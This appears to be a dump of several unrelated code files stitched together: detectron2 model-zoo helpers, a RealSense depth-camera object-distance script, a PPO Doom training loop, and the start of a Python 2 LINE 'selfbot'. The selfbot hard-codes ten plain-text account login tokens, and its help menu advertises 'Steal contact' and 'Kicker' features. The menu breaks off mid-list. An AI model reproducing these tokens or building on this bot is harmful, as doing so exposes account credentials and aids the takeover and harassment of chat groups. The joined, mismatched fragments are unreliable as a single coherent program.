        "COCO-Keypoints/keypoint_rcnn_R_50_FPN_3x.yaml": "137849621/model_final_a6e10b.pkl",
        "COCO-Keypoints/keypoint_rcnn_R_101_FPN_3x.yaml": "138363331/model_final_997cc7.pkl",
        "COCO-Keypoints/keypoint_rcnn_X_101_32x8d_FPN_3x.yaml": "139686956/model_final_5ad38f.pkl",
        # COCO Panoptic Segmentation Baselines with Panoptic FPN
        "COCO-PanopticSegmentation/panoptic_fpn_R_50_1x.yaml": "139514544/model_final_dbfeb4.pkl",
        "COCO-PanopticSegmentation/panoptic_fpn_R_50_3x.yaml": "139514569/model_final_c10459.pkl",
        "COCO-PanopticSegmentation/panoptic_fpn_R_101_3x.yaml": "139514519/model_final_cafdb1.pkl",
        # LVIS Instance Segmentation Baselines with Mask R-CNN
        "LVIS-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml": "144219072/model_final_571f7c.pkl",
        "LVIS-InstanceSegmentation/mask_rcnn_R_101_FPN_1x.yaml": "144219035/model_final_824ab5.pkl",
        "LVIS-InstanceSegmentation/mask_rcnn_X_101_32x8d_FPN_1x.yaml": "144219108/model_final_5e3439.pkl", # noqa
        # Cityscapes & Pascal VOC Baselines
        "Cityscapes/mask_rcnn_R_50_FPN.yaml": "142423278/model_final_af9cf5.pkl",
        "PascalVOC-Detection/faster_rcnn_R_50_C4.yaml": "142202221/model_final_b1acc2.pkl",
        # Other Settings
        "Misc/mask_rcnn_R_50_FPN_1x_dconv_c3-c5.yaml": "138602867/model_final_65c703.pkl",
        "Misc/mask_rcnn_R_50_FPN_3x_dconv_c3-c5.yaml": "144998336/model_final_821d0b.pkl",
        "Misc/cascade_mask_rcnn_R_50_FPN_1x.yaml": "138602847/model_final_e9d89b.pkl",
        "Misc/cascade_mask_rcnn_R_50_FPN_3x.yaml": "144998488/model_final_480dd8.pkl",
        "Misc/mask_rcnn_R_50_FPN_3x_syncbn.yaml": "169527823/model_final_3b3c51.pkl",
        "Misc/mask_rcnn_R_50_FPN_3x_gn.yaml": "138602888/model_final_dc5d9e.pkl",
        "Misc/scratch_mask_rcnn_R_50_FPN_3x_gn.yaml": "138602908/model_final_01ca85.pkl",
        "Misc/panoptic_fpn_R_101_dconv_cascade_gn_3x.yaml": "139797668/model_final_be35db.pkl",
        "Misc/cascade_mask_rcnn_X_152_32x8d_FPN_IN5k_gn_dconv.yaml": "18131413/model_0039999_e76410.pkl", # noqa
        # D1 Comparisons
        "Detectron1-Comparisons/faster_rcnn_R_50_FPN_noaug_1x.yaml": "137781054/model_final_7ab50c.pkl", # noqa
        "Detectron1-Comparisons/mask_rcnn_R_50_FPN_noaug_1x.yaml": "137781281/model_final_62ca52.pkl", # noqa
        "Detectron1-Comparisons/keypoint_rcnn_R_50_FPN_1x.yaml": "137781195/model_final_cce136.pkl",
    }
def get_checkpoint_url(config_path):
    """
    Returns the URL to the model trained using the given config
    Args:
        config_path (str): config file name relative to detectron2's "configs/"
            directory, e.g., "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml"
    Returns:
        str: a URL to the model
    Raises:
        RuntimeError: if the config is not a known model-zoo entry.
    """
    name = config_path.replace(".yaml", "")
    suffix = _ModelZooUrls.CONFIG_PATH_TO_URL_SUFFIX.get(config_path)
    if suffix is None:
        raise RuntimeError("{} not available in Model Zoo!".format(name))
    return _ModelZooUrls.S3_PREFIX + name + "/" + suffix
def get_config_file(config_path):
    """
    Returns path to a builtin config file.
    Args:
        config_path (str): config file name relative to detectron2's "configs/"
            directory, e.g., "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml"
    Returns:
        str: the real path to the config file.
    Raises:
        RuntimeError: if the packaged config file does not exist on disk.
    """
    cfg_file = pkg_resources.resource_filename(
        "detectron2.model_zoo", os.path.join("configs", config_path)
    )
    if os.path.exists(cfg_file):
        return cfg_file
    raise RuntimeError("{} not available in Model Zoo!".format(config_path))
def get(config_path, trained: bool = False):
    """
    Get a model specified by relative path under Detectron2's official ``configs/`` directory.
    Args:
        config_path (str): config file name relative to detectron2's "configs/"
            directory, e.g., "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml"
        trained (bool): If True, will initialize the model with the trained model zoo weights.
            If False, the checkpoint specified in the config file's ``MODEL.WEIGHTS`` is used
            instead; this will typically (though not always) initialize a subset of weights using
            an ImageNet pre-trained model, while randomly initializing the other weights.
    Returns:
        nn.Module: a detectron2 model
    Example:
    ::
        from detectron2 import model_zoo
        model = model_zoo.get("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml", trained=True)
    """
    cfg = get_cfg()
    cfg.merge_from_file(get_config_file(config_path))
    if trained:
        cfg.MODEL.WEIGHTS = get_checkpoint_url(config_path)
    if not torch.cuda.is_available():
        # Fall back to CPU inference when no GPU is present.
        cfg.MODEL.DEVICE = "cpu"
    model = build_model(cfg)
    DetectionCheckpointer(model).load(cfg.MODEL.WEIGHTS)
    return model
# E.g. # model = model_zoo.get("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml", trained=True)
# <<---------------------- load predefined model -------------------
# Resolution of camera streams (width x height)
RESOLUTION_X = 640 # 640, 1280
RESOLUTION_Y = 360 # 480, 720
# Configuration for histogram for depth image
NUM_BINS = 500  # 500 x depth_scale = e.g. 500x0.001m=50cm
MAX_RANGE = 10000  # 10000xdepth_scale = e.g. 10000x0.001m=10m
AXES_SIZE = 10  # scale used when sizing velocity direction arrows (see create_vector_arrow)
class VideoStreamer:
    """
    Video streamer that takes advantage of multi-threading, and continuously is reading frames.
    Frames are then ready to read when program requires.
    """
    def __init__(self, video_file=None):
        """
        When initialised, VideoStreamer object should be reading frames
        """
        self.setup_image_config(video_file)
        self.configure_streams()
        self.stopped = False

    def start(self):
        """
        Initialise thread, update method will run under thread
        """
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """
        Constantly read frames until stop() method is introduced
        """
        # NOTE(review): color_image/depth_image only exist after the first
        # frame arrives; calling read() before then raises AttributeError --
        # confirm callers wait for the stream to warm up.
        while True:
            if self.stopped:
                return
            frames = self.pipeline.wait_for_frames()
            # Align the depth frame to the colour stream so pixels correspond.
            frames = self.align.process(frames)
            color_frame = frames.get_color_frame()
            depth_frame = frames.get_depth_frame()
            self.depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics
            # Convert image to numpy array and initialise images
            self.color_image = np.asanyarray(color_frame.get_data())
            self.depth_image = np.asanyarray(depth_frame.get_data())

    def stop(self):
        # Stop the pipeline, then flag the update loop so the thread exits.
        self.pipeline.stop()
        self.stopped = True

    def read(self):
        # Latest (color, depth) image pair captured by the background thread.
        return (self.color_image, self.depth_image)

    def setup_image_config(self, video_file=None):
        """
        Setup config and video steams. If --file is specified as an argument, setup
        stream from file. The input of --file is a .bag file in the bag_files folder.
        .bag files can be created using d435_to_file in the tools folder.
        video_file is by default None, and thus will by default stream from the
        device connected to the USB.
        """
        config = rs.config()
        if video_file is None:
            # Live device: depth (z16) and colour (bgr8) streams at 30 fps.
            config.enable_stream(rs.stream.depth, RESOLUTION_X, RESOLUTION_Y, rs.format.z16, 30)
            config.enable_stream(rs.stream.color, RESOLUTION_X, RESOLUTION_Y, rs.format.bgr8, 30)
        else:
            try:
                config.enable_device_from_file("bag_files/{}".format(video_file))
            except:
                # NOTE(review): bare except swallows every error and then
                # continues with an unconfigured stream -- consider narrowing
                # the exception type and re-raising.
                print("Cannot enable device from: '{}'".format(video_file))
        self.config = config

    def configure_streams(self):
        # Configure video streams
        self.pipeline = rs.pipeline()
        # Start streaming
        self.profile = self.pipeline.start(self.config)
        self.align = rs.align(rs.stream.color)

    def get_depth_scale(self):
        # Metres per depth unit reported by the device (e.g. 0.001).
        return self.profile.get_device().first_depth_sensor().get_depth_scale()
class Predictor(DefaultPredictor):
    """DefaultPredictor pre-configured for Mask R-CNN R101-FPN instance segmentation."""

    def __init__(self):
        self.config = self.setup_predictor_config()
        super().__init__(self.config)

    def create_outputs(self, color_image):
        """Run inference on a BGR image and cache the raw outputs on self."""
        self.outputs = self(color_image)

    def setup_predictor_config(self):
        """
        Setup config and return predictor. See config/defaults.py for more options
        """
        config_path = 'COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml'
        print(f'vip-Using {config_path} at /Users/bowu/opt/anaconda3/lib/python3.7/site-packages/detectron2/engine/defaults.py')
        # cfg_file = get_config_file(config_path)
        cfg = get_cfg()
        cfg.merge_from_file("configs/COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml")
        pretrained = True
        if pretrained:
            # Pull the official model-zoo weights matching the config.
            cfg.MODEL.WEIGHTS = get_checkpoint_url(config_path)
        cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.4
        # Mask R-CNN ResNet101 FPN weights
        # cfg.MODEL.WEIGHTS = "model_final_a3ec72.pkl"
        # This determines the resizing of the image. At 0, resizing is disabled.
        cfg.INPUT.MIN_SIZE_TEST = 0
        return cfg

    def format_results(self, class_names):
        """
        Format results so they can be used by overlay_instances function
        """
        predictions = self.outputs['instances']
        boxes = predictions.pred_boxes if predictions.has("pred_boxes") else None
        scores = predictions.scores if predictions.has("scores") else None
        classes = predictions.pred_classes if predictions.has("pred_classes") else None
        labels = None
        if classes is not None and class_names is not None and len(class_names) > 1:
            labels = [class_names[i] for i in classes]
        if scores is not None:
            if labels is None:
                labels = ["{:.0f}%".format(s * 100) for s in scores]
            else:
                labels = ["{} {:.0f}%".format(l, s * 100) for l, s in zip(labels, scores)]
        masks = predictions.pred_masks.cpu().numpy()
        # BUG FIX: the original referenced an undefined name `v` for the image
        # dimensions (v.output.height/width -> NameError). Each predicted mask
        # is a full-frame array, so take height/width from the mask itself.
        masks = [GenericMask(m, m.shape[0], m.shape[1]) for m in masks]
        boxes_list = boxes.tensor.tolist()
        scores_list = scores.tolist()
        class_list = classes.tolist()
        # Append score and class id onto each box row for downstream tracking.
        for i in range(len(scores_list)):
            boxes_list[i].append(scores_list[i])
            boxes_list[i].append(class_list[i])
        boxes_list = np.array(boxes_list)
        return (masks, boxes, boxes_list, labels, scores_list, class_list)
class OptimizedVisualizer(Visualizer):
    """
    Detectron2's altered Visualizer class which converts boxes tensor to cpu
    """

    def __init__(self, img_rgb, metadata, scale=1.0, instance_mode=ColorMode.IMAGE):
        super().__init__(img_rgb, metadata, scale, instance_mode)

    def _convert_boxes(self, boxes):
        """
        Convert different format of boxes to an NxB array, where B = 4 or 5 is the box dimension.
        """
        if isinstance(boxes, (Boxes, RotatedBoxes)):
            # Move GPU tensors to host memory before converting.
            return boxes.tensor.cpu().numpy()
        return np.asarray(boxes)
class DetectedObject:
    """
    Each object corresponds to all objects detected during the instance segmentation
    phase. Associated trackers, distance, position and velocity are stored as attributes
    of the object.
    masks[i], boxes[i], labels[i], scores_list[i], class_list[i]
    """
    def __init__(self, mask, box, label, score, class_name):
        # NOTE(review): self.distance and self.track are read by __str__ and
        # create_vector_arrow but assigned elsewhere after construction --
        # confirm callers set them before printing.
        self.mask = mask
        self.box = box
        self.label = label
        self.score = score
        self.class_name = class_name

    def __str__(self):
        # Human-readable summary; tracking lines are appended only when the
        # corresponding attributes have been attached to self.track.
        ret_str = "The pixel mask of {} represents a {} and is {}m away from the camera.\n".format(self.mask,
                                                                                                   self.class_name,
                                                                                                   self.distance)
        if hasattr(self, 'track'):
            if hasattr(self.track, 'speed'):
                # Positive speed is rendered as moving towards the camera.
                if self.track.speed >= 0:
                    ret_str += "The {} is travelling {}m/s towards the camera\n".format(self.class_name,
                                                                                       self.track.speed)
                else:
                    ret_str += "The {} is travelling {}m/s away from the camera\n".format(self.class_name,
                                                                                         abs(self.track.speed))
            if hasattr(self.track, 'impact_time'):
                ret_str += "The {} will collide in {} seconds\n".format(self.class_name, self.track.impact_time)
            if hasattr(self.track, 'velocity'):
                ret_str += "The {} is located at {} and travelling at {}m/s\n".format(self.class_name,
                                                                                     self.track.position,
                                                                                     self.track.velocity)
        return ret_str

    def create_vector_arrow(self):
        """
        Creates direction arrow which will use Arrow3D object. Converts vector to a suitable size so that the direction is clear.
        NOTE: The magnitude of the velocity is not represented through this arrow. The arrow lengths are almost all identical
        """
        # Scale so the largest velocity component spans AXES_SIZE plot units.
        arrow_ratio = AXES_SIZE / max(abs(self.track.velocity_vector[0]), abs(self.track.velocity_vector[1]),
                                      abs(self.track.velocity_vector[2]))
        self.track.v_points = [x * arrow_ratio for x in self.track.velocity_vector]
class Arrow3D(FancyArrowPatch):
    """
    Arrow used to demonstrate direction of travel for each object
    """
    def __init__(self, xs, ys, zs, *args, **kwargs):
        # Start as a degenerate 2-D arrow; the real endpoints are computed by
        # projecting the stored 3-D vertices at draw time.
        FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)
        self._verts3d = xs, ys, zs

    def draw(self, renderer):
        # Project the 3-D endpoints into 2-D display coordinates, then let
        # FancyArrowPatch render the arrow between them.
        # NOTE(review): ``renderer.M`` is an older mpl_toolkits/mplot3d access
        # pattern that newer Matplotlib releases removed — confirm against the
        # installed Matplotlib version.
        xs3d, ys3d, zs3d = self._verts3d
        xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)
        self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))
        FancyArrowPatch.draw(self, renderer)
def find_mask_centre(mask, color_image):
    """
    Return the (cX, cY) centroid of ``mask`` using image moments.

    Parameters
    ----------
    mask : 2-D array-like mask (non-zero inside the object).
    color_image : unused; kept for backward compatibility with existing callers.

    Returns
    -------
    (int, int) centroid coordinates (truncated, matching the original int()).

    Raises
    ------
    ValueError if the mask is empty (the original raised a bare
    ZeroDivisionError from the m00 division in that case).
    """
    m = np.asarray(mask, dtype=np.float64)
    m00 = m.sum()  # zeroth spatial moment == total mask weight / area
    if m00 == 0:
        raise ValueError("cannot find the centre of an empty mask")
    height, width = m.shape
    # First-order spatial moments, equivalent to cv2.moments()["m10"/"m01"].
    m10 = (m * np.arange(width)[np.newaxis, :]).sum()
    m01 = (m * np.arange(height)[:, np.newaxis]).sum()
    cX = int(m10 / m00)
    cY = int(m01 / m00)
    return cX, cY
def find_median_depth(mask_area, num_median, histg):
    """
    Walk the depth histogram cumulatively until ``num_median`` samples have
    been seen, and return that bin's depth in metres (bin index / 50, i.e.
    each bin spans 20mm).

    Parameters
    ----------
    mask_area : unused; kept for backward compatibility with existing callers.
    num_median : number of samples constituting half of the mask area.
    histg : histogram as produced by cv2.calcHist — a sequence of one-element
            count arrays.

    Returns
    -------
    float median depth in metres; 0.0 if the histogram never accumulates
    ``num_median`` samples.
    """
    cumulative = 0
    for bin_index, counts in enumerate(histg):
        cumulative += counts[0]
        if cumulative >= num_median:
            # Half of the histogram has been iterated through, therefore this
            # bin contains the median.
            return bin_index / 50
    return 0.0
def debug_plots(color_image, depth_image, mask, histg, depth_colormap):
    """
    Debugging helper: plots the depth colormap, the object mask, the
    mask/colormap bitwise_and, and the histogram distributions of the full
    image vs. the masked region.
    """
    full_hist = cv2.calcHist([depth_image], [0], None, [NUM_BINS], [0, MAX_RANGE])
    masked_depth_image = cv2.bitwise_and(depth_colormap, depth_colormap, mask=mask)
    plt.figure()
    plt.subplot(2, 2, 1)
    plt.imshow(depth_colormap)
    plt.subplot(2, 2, 2)
    # BUG FIX: previously plotted the module-level ``masks[i].mask`` and
    # titled with ``labels[i]`` — names not defined in this function's scope —
    # instead of using the ``mask`` argument the caller already passes.
    plt.imshow(mask)
    plt.subplot(2, 2, 3).set_title("masked depth")
    plt.imshow(masked_depth_image)
    plt.subplot(2, 2, 4)
    plt.plot(full_hist)
    plt.plot(histg)
    plt.xlim([0, 600])
    plt.show()
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--file', help='type --file=file-name.bag to stream using file instead of webcam')
    args = parser.parse_args()

    # Initialise Detectron2 predictor
    predictor = Predictor()

    # Initialise video streams from D435
    video_streamer = VideoStreamer()

    # Initialise Kalman filter tracker from modified Sort module
    # mot_tracker = Sort()

    depth_scale = video_streamer.get_depth_scale()
    print("Depth Scale is: {:.4f}m".format(depth_scale))

    speed_time_start = time.time()
    video_streamer.start()
    time.sleep(1)

    while True:
        time_start = time.time()
        color_image, depth_image = video_streamer.read()
        detected_objects = []

        t1 = time.time()
        camera_time = t1 - time_start

        # Run instance segmentation on the current frame.
        predictor.create_outputs(color_image)
        outputs = predictor.outputs
        t2 = time.time()
        model_time = t2 - t1
        print("Model took {:.2f} time".format(model_time))

        predictions = outputs['instances']
        if outputs['instances'].has('pred_masks'):
            num_masks = len(predictions.pred_masks)
        else:
            # # Even if no masks are found, the trackers must still be updated
            # tracked_objects = mot_tracker.update(boxes_list)
            continue

        detectron_time = time.time()

        # Create a new Visualizer object from Detectron2
        v = OptimizedVisualizer(color_image[:, :, ::-1], MetadataCatalog.get(predictor.config.DATASETS.TRAIN[0]))

        masks, boxes, boxes_list, labels, scores_list, class_list = predictor.format_results(
            v.metadata.get("thing_classes"))

        for i in range(num_masks):
            # BUG FIX: the append used to sit outside the try block, so a
            # failed construction either raised NameError (first iteration) or
            # silently appended the previous, stale object.
            try:
                detected_obj = DetectedObject(masks[i], boxes[i], labels[i], scores_list[i], class_list[i])
            except Exception:
                print("Object doesn't meet all parameters")
            else:
                detected_objects.append(detected_obj)

        # tracked_objects = mot_tracker.update(boxes_list)

        v.overlay_instances(
            masks=masks,
            boxes=boxes,
            labels=labels,
            keypoints=None,
            assigned_colors=None,
            alpha=0.3
        )

        speed_time_end = time.time()
        total_speed_time = speed_time_end - speed_time_start
        speed_time_start = time.time()

        # Iterate the successfully constructed objects directly; indexing by
        # range(num_masks) would misalign whenever a construction was skipped.
        for detected in detected_objects:
            # Converting the depth image to a histogram with NUM_BINS bins
            # and a depth range of (0 - MAX_RANGE millimetres).
            mask_area = detected.mask.area()
            num_median = math.floor(mask_area / 2)
            histg = cv2.calcHist([depth_image], [0], detected.mask.mask, [NUM_BINS], [0, MAX_RANGE])

            # Uncomment this to use the debugging function
            # depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)
            # debug_plots(color_image, depth_image, detected.mask.mask, histg, depth_colormap)

            centre_depth = find_median_depth(mask_area, num_median, histg)
            detected.distance = centre_depth

            cX, cY = find_mask_centre(detected.mask._mask, v.output)
            v.draw_circle((cX, cY), (0, 0, 0))
            v.draw_text("{:.2f}m".format(centre_depth), (cX, cY + 20))

        # for i in detected_objects:
        #     print(i)

        # depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)
        # cv2.imshow('Segmented Image', color_image)
        cv2.imshow('Segmented Image', v.output.get_image()[:, :, ::-1])
        # cv2.imshow('Depth', depth_colormap)

        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

        time_end = time.time()
        total_time = time_end - time_start
        print("Time to process frame: {:.2f}".format(total_time))
        print("FPS: {:.2f}\n".format(1 / total_time))

    video_streamer.stop()
    cv2.destroyAllWindows()
init_ppo.py | #!/usr/bin/env python3
import numpy as np
import tensorflow as tf
import threading, time
from threading import Thread, Lock
from wrappers.doom import Sandbox
from agent import AsynchronousAgent
from networks import actor_critic_ppo
from utils import load_config, log_feedback
# -----------------------------
physical_devices = tf.config.experimental.list_physical_devices("GPU")
tf.config.experimental.set_memory_growth(physical_devices[0], True)
print("GPU is", "available" if physical_devices else "NOT AVAILABLE")
print("Eager mode:", tf.executing_eagerly())
# -----------------------------
config = load_config('config.yml')['doom-a2c']
log_dir = "metrics/"
# -----------------------------
sandbox = Sandbox(config)
env, action_space = sandbox.build_env(config['env_name'])
actor, critic = actor_critic_ppo(config['input_shape'], config['window_length'], action_space, config['learning_rate'])
actor.summary()
agent = AsynchronousAgent(config, sandbox, env, action_space)
lock = Lock()
# -----------------------------
def execute():
    """
    Single-threaded PPO training loop.

    Collects a rollout from the global ``env``, triggers a PPO update via
    ``agent.learn_ppo`` at each episode end, logs metrics to TensorBoard, and
    stops once the running reward reaches config['min_max'][1].
    """
    timestamp, summary_writer = log_feedback(log_dir)
    print("Job ID:", timestamp)

    frame_count = 0
    episode_count = 0

    a_loss, c_loss = 0, 0

    # Sliding window (last 100 entries) used to compute the running reward.
    episode_reward_history = []
    episode_reward = 0
    eval_reward = config['min_max'][0]
    min_reward = config['min_max'][0]

    life = 0
    max_life = 0

    # -----------------------------
    print("Training...")

    terminal, state, info, image_memory = sandbox.async_reset(env)
    prev_info = info

    # Per-episode rollout buffers consumed by learn_ppo.
    actions, states, rewards, predictions = [], [], [], []

    while True:
        action, prediction = agent.policy_act(state, actor)
        state_next, reward, terminal, info = sandbox.async_step(env, action, prev_info, image_memory)

        actions.append(sandbox.one_hot(env, action))
        states.append(tf.expand_dims(state_next, 0))
        rewards.append(reward)
        predictions.append(prediction)

        if terminal:
            a_loss, c_loss = agent.learn_ppo(actor, critic, actions, states, rewards, predictions)
            actions, states, rewards, predictions = [], [], [], []
            # NOTE(review): episode_reward is zeroed here, *before* the
            # append further below, so the history stores 0 on terminal frames
            # and the final reward of an episode is never recorded — confirm
            # this ordering is intentional.
            episode_reward = 0
            episode_count += 1
            max_life = max(life, max_life)
            life = 0
        else:
            episode_reward += reward
            life += 1

        prev_info = info
        state = state_next

        # Appended every frame (not once per episode): running_reward is a
        # mean over the per-frame cumulative rewards of the last 100 frames.
        episode_reward_history.append(episode_reward)
        if len(episode_reward_history) > 100:
            del episode_reward_history[:1]
        running_reward = np.mean(episode_reward_history)

        if terminal:
            print("Frame: {}, Episode: {}, Reward: {}, Actor Loss: {}, Critic Loss: {}, Max Life: {}".format(frame_count, episode_count, running_reward, a_loss, c_loss, max_life))
            with summary_writer.as_default():
                tf.summary.scalar('a_loss', a_loss, step=episode_count)
                tf.summary.scalar('c_loss', c_loss, step=episode_count)
                tf.summary.scalar('running_reward', running_reward, step=episode_count)
                tf.summary.scalar('eval_reward', eval_reward, step=episode_count)
                tf.summary.scalar('max_life', max_life, step=episode_count)

        if terminal and running_reward > (min_reward + 1):
            # Checkpoint and evaluate whenever the running reward improves
            # by more than 1 over the previous best.
            agent.save(actor, log_dir + timestamp)
            eval_reward = agent.evaluate(actor, (log_dir + timestamp), episode_count)
            min_reward = running_reward

        if running_reward == config['min_max'][1]:
            agent.save(actor, log_dir + timestamp)
            print("Solved at episode {}!".format(episode_count))
            break

        frame_count += 1

    env.close()
# -----------------------------
def async_train(n_threads):
    """
    Spawn ``n_threads`` daemon workers, each running train_threading on its
    own environment instance, with staggered starts and joins.
    """
    env.close()
    worker_envs = [sandbox.build_env(config['env_name'])[0] for _ in range(n_threads)]
    workers = []
    for index, worker_env in enumerate(worker_envs):
        workers.append(threading.Thread(target=train_threading, daemon=True, args=(worker_env, index)))
    for worker in workers:
        time.sleep(2)
        worker.start()
    for worker in workers:
        time.sleep(10)
        worker.join()
def train_threading(env, thread):
    """
    Worker loop for one training thread.

    Collects (action, state, reward, prediction) rollouts from ``env`` and
    runs a PPO update on the shared actor/critic at each episode end,
    serialised across workers by the module-level ``lock``.
    """
    timestamp, summary_writer = log_feedback(log_dir)
    print("Job ID:", timestamp)

    frame_count = 0
    episode_count = 0

    a_loss, c_loss = 0, 0

    episode_reward_history = []
    episode_reward = 0
    eval_reward = config['min_max'][0]
    min_reward = config['min_max'][0]

    life = 0
    max_life = 0

    # BUG FIX: a thread-local ``lock = Lock()`` was created here, so every
    # worker acquired its own private lock and the PPO update was never
    # actually serialised across threads. The shared module-level ``lock``
    # is used instead.

    # -----------------------------
    print("Training...")

    terminal, state, info, image_memory = sandbox.async_reset(env)
    prev_info = info

    # Per-episode rollout buffers consumed by learn_ppo.
    actions, states, rewards, predictions = [], [], [], []

    while True:
        action, prediction = agent.policy_act(state, actor)
        state_next, reward, terminal, info = sandbox.async_step(env, action, prev_info, image_memory)

        actions.append(sandbox.one_hot(env, action))
        states.append(tf.expand_dims(state_next, 0))
        rewards.append(reward)
        predictions.append(prediction)

        if terminal:
            with lock:  # one PPO update at a time across workers
                a_loss, c_loss = agent.learn_ppo(actor, critic, actions, states, rewards, predictions)
            # BUG FIX: previously reset ``prediction`` (the scalar) instead of
            # ``predictions`` (the buffer), so stale predictions accumulated
            # across episodes and desynchronised from the other buffers.
            actions, states, rewards, predictions = [], [], [], []
            episode_reward = 0
            episode_count += 1
            max_life = max(life, max_life)
            life = 0
        else:
            episode_reward += reward
            life += 1

        prev_info = info
        state = state_next

        episode_reward_history.append(episode_reward)
        if len(episode_reward_history) > 100:
            del episode_reward_history[:1]
        running_reward = np.mean(episode_reward_history)

        with lock:
            if terminal:
                print("Frame: {}, Episode: {}, Thread: {}, Reward: {}, Actor Loss: {}, Critic Loss: {}, Max Life: {}".format(frame_count, episode_count, thread, running_reward, a_loss, c_loss, max_life))
                with summary_writer.as_default():
                    tf.summary.scalar('a_loss', a_loss, step=episode_count)
                    tf.summary.scalar('c_loss', c_loss, step=episode_count)
                    tf.summary.scalar('running_reward', running_reward, step=episode_count)
                    tf.summary.scalar('eval_reward', eval_reward, step=episode_count)
                    tf.summary.scalar('max_life', max_life, step=episode_count)

        if terminal and running_reward > (min_reward + 1):
            agent.save(actor, log_dir + timestamp)
            min_reward = running_reward

        if running_reward == config['min_max'][1]:
            agent.save(actor, log_dir + timestamp)
            print("Solved at episode {}!".format(episode_count))
            break

        frame_count += 1

    env.close()
# -----------------------------
execute()
# async_train(n_threads=3)
|
t.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
# SECURITY NOTE(review): LINE authentication tokens are hard-coded below in
# plain text and committed to source control. These credentials should be
# revoked immediately and loaded from environment variables or a config file
# excluded from version control instead.
cl = LINETCR.LINE()
cl.login(token="EqBtIvxxVKKpceAKP9b8./xAA3piZkDNk7C2fd2Ya.z+oFeZ51V5KS94eIgEdtL+AD730jKJ9J+yUHMd7fY=")
cl.loginResult()
ki = LINETCR.LINE()
ki.login(token="EqvZ9DLPuSjeWdQVh4P1.As0xdoubrMVK87aCEwiq.RdxMiEBVjdjX1Voo3HWYmlu+hunIoOME8VXq36HK4=")
ki.loginResult()
ki2 = LINETCR.LINE()
ki2.login(token="EqVxkQSILbZMXzdwUJu6./QTl046oneusnakwA1BlvG.bp+q0pOXUGpActC2hseQ7ita2kYBu2t8GhgT6IxKE=")
ki2.loginResult()
ki3 = LINETCR.LINE()
ki3.login(token="Eqi3nFU7AN1msVz21jy4.rPChBbvqv2dePvyacNqf9a.if68zXj7EpSeI99Adwd9Kjh+QxUlf3ByioF+1HqJc=")
ki3.loginResult()
ki4 = LINETCR.LINE()
ki4.login(token="Eq01swaekVy7bot8OIb0.ALeoPWu5rBLgzDeTaBkyma.kNxeK5NmYzAhuPxBjuXR4xrLB5RtvcIjcssHvScsk=")
ki4.loginResult()
ki5 = LINETCR.LINE()
ki5.login(token="Eq8myQ5qiRXudJN6kJca.B1iRtmw7Z7j0en+FoJLJ2G.dbkRKNrcdTptrQhrO95CzLhHBK7Jk+lVmwjLh35ig=")
ki5.loginResult()
ki6 = LINETCR.LINE()
ki6.login(token="EqVGVRhWAZMAjq7rDwra.B8U5BeLQR0weg1uivR72sG.1/i20+5R9yP2OYrYEBG8wGmrSGlt9DF7KTtm0Y4MA=")
ki6.loginResult()
ki7 = LINETCR.LINE()
ki7.login(token="EqfBCvF8SnPPzdY7eEk4.pUox2JbsCqz2R9I6aLvtLa.o6fLrarPrrp+iwN/43h8zERugbu0wd+oesOb3AchY=")
ki7.loginResult()
ki8 = LINETCR.LINE()
ki8.login(token="Eqsb1uEpPDEGNyPOw0J0.dvkllQAMvSv/TKq0R9lJKa.3a96tHtTmhj/endngz8mSTFMQY2XQPBhIupKQbKpI=")
ki8.loginResult()
ki9 = LINETCR.LINE()
ki9.login(token="EqEw4MaEpSRBS6yXT3t5.NiWilBa0jddRHKn+YZanTq.FOwq8ou7rp302aejCT5aGKzrDMo69uMry57gB3Kh0=")
ki9.loginResult()
ki10 = LINETCR.LINE()
ki10.login(token="Eq0J2ShcJs0AL6oYFHt5.4zF+n3EzW08xwO3fALhIvq.HUjv1MErvKSf4JsS/ULBY27bASBwNEnDM5QyyEIeM=")
ki10.loginResult()
print u"Login Success CyberTK"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""╔══════════════════════
║ ™☆☞General Command☜☆™
╠═══☆☞H E L P☜☆═════════
╠🌟『Owner』
╠🌟『Pap owner』
╠🌟『Speed』
╠🌟『Speed test』
╠🌟『Status』
╠═══☆☞S E L F☜☆═════════
╠✨『Hi』
╠✨『Me』
╠✨『Mymid』
╠✨『Mid @』
╠✨『SearchID ID LINE)』
╠✨『Checkdate DD/MM/YY』
╠✨『Kalender』
╠✨『Steal contact』
╠✨『Getpict @』
╠✨『Getcover @』
╠✨『Auto like』
╠✨『System』
╠✨『Kernel』
╠✨『Cpu』
╠✨『Bio @』
╠✨『Info @』
╠✨『Name @』
╠✨『Profile @』
╠✨『Contact @』
╠✨『Comment on/off』
╠✨『Friendlist』
╠✨『Kicker on/off』
╠✨『Repdel @』
╠✨『Miclist』
╠═══☆☞ B O T ☜☆═════════
╠🚨『Absen』
╠🚨『Respon』
╠🚨『Runtime』
╠🚨『copy @』
╠🚨『Copycontact』
╠🚨『Mybackup』
╠🚨『Mybio Text』
╠🚨『Myname Text』
╠🚨『@bye』
╠🚨『Bot on/off』
╠═══☆☞ M E D I A ☜☆═══════
╠💻『Gift』
╠💻『Giftbycontact』
╠💻『Gif gore』
